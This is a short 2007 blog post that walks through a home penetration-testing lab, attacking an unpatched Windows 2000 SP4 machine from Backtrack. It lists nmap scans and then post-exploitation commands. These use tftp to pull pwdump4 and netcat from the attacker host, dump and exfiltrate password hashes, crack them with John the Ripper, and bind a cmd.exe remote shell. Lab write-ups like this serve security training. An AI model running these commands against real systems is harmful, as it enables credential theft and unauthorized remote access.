Wednesday, June 27, 2007

Penetration Tester Lab

First of all, you must have your own machine to hack. In this scenario, i'll setup windows 2000 sp4 and linux redhat 6.2

this old version of linux can be download at

Download Redhat 6.2 here

Installing and Securing IIS Servers

The other machine is Backtrack that already installed into my hard disk for attacking purposes.
By default, windows 2000 sp4 is vulnerable to lsass exploit. So, make sure you patch your machine accordingly. In this lab, i won't patch it to show how the attack can be done.

Windows SP4 - 10.21.11.81
Backtrack (Attacker - 10.21.11.84)

On Backtrack, scan windows 2004 sp4 using nmap

nmap -sT -O 10.21.11.81
nmap -sV 10.21.11.81 -p 23,25,80
nmap -sU 10.21.11.81



cd /pentest/password/dictionaries
gunzip -c wordlist.txt.gz > /tmp/wordlist.txt

exploit the machine...n get the shell.

From the windows 2004, run

tftp -i 10.21.11.84 get pwdump4.exe
tftp -i 10.21.11.84 get pwdump4.dll
tftp -i 10.21.11.84 get nc.exe


pwdump4 /l /o:pwdump4.txt
tftp 10.21.11.84 put pwdump4.txt

From Backtrack,

cat pwdump4.txt
john -w:wordlist.txt pwdump4.txt
john --show pwdump4.txt
john -w:wordlist.txt -f:NT pwdump4.txt


From Windows,

nc -L -p 2111 -e cmd.exe
telnet 10.21.11.81 2111
whoami


that's it, and GAME OVER

No comments:

LinkWithin

Related Posts with Thumbnails